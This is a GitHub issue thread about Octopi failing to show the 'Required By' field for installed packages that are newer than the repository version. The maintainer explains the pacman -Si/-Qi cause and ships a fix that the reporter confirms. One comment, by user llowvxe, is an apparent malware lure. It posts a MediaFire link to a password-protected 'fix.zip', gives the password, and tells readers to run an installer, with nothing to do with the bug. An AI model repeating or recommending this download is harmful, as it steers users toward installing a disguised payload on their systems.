### ISSUE TITLE
Octopi doesn't list `Required By` in the Info tab when the installed package version is newer than what's in the repository.

### ISSUE THREAD

**Issue by urbenlegend** [aarnt/octopi#567]
So occasionally I'll temporarily enable the testing repos to download a few updates that I am eager to have. After installation, I'll disable the testing repos. Whenever I use Octopi to browse these packages and I go to the Info tab, I never see the "Required By" field, even for packages that I know for sure are depended on by others.

This happened to me with mesa 24.2 in the testing repos. Doing a regular `pacman -Qi mesa` did show the Required By field though, so it feels Octopi specific.

**Comment by llowvxe** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by aarnt** [comment]
@urbenlegend 
Probably because the the newer version packages are not installed, then octopi is using "pacman -Si mesa" to show the info, not "pacman -Qi mesa".

**Comment by urbenlegend** [comment]
Sorry, I am a bit confused. Newer versions of packages ARE installed onto the system though. They're just newer than the packages in the official remote repositories.

For example, I temporarily enable testing repos to upgrade from Mesa 24.1.6 to 24.2. Then I disable the testing repos. Now Octopi says that the installed version is newer than the one available from the remote repositories. That's when the bug occurs.

**Comment by aarnt** [comment]
That's because the version of mesa that remains is not installed. The concept of a newer package was wrong and I changed it a couple of days ago (https://github.com/aarnt/octopi/commit/22d8dbeb7b79f2e2f78797663cfe0f6d71ef059b).

TLDR :  not all info fields are available from a pkg that is not installed, because the command used is 'pacman -Si pkg'.

**Comment by urbenlegend** [comment]
Right, but shouldn't the info panel show information about the Mesa that is installed? I don't think the user cares about the package in the repo if they have a newer version installed. They want to see the info of what's currently on their system.

**Comment by aarnt** [comment]
Ok, I think I made the adjustment upstream.
Can you test?

**Comment by urbenlegend** [comment]
I tested with the latest master and it appears to have fixed it! As a test, I upgraded python-urllib3 by temporarily enabling the `extra-testing` repo and then disabling it. The latest master of Octopi correctly shows the Required By field while 0.16.2 does not.

Thanks for the quick fix @aarnt!
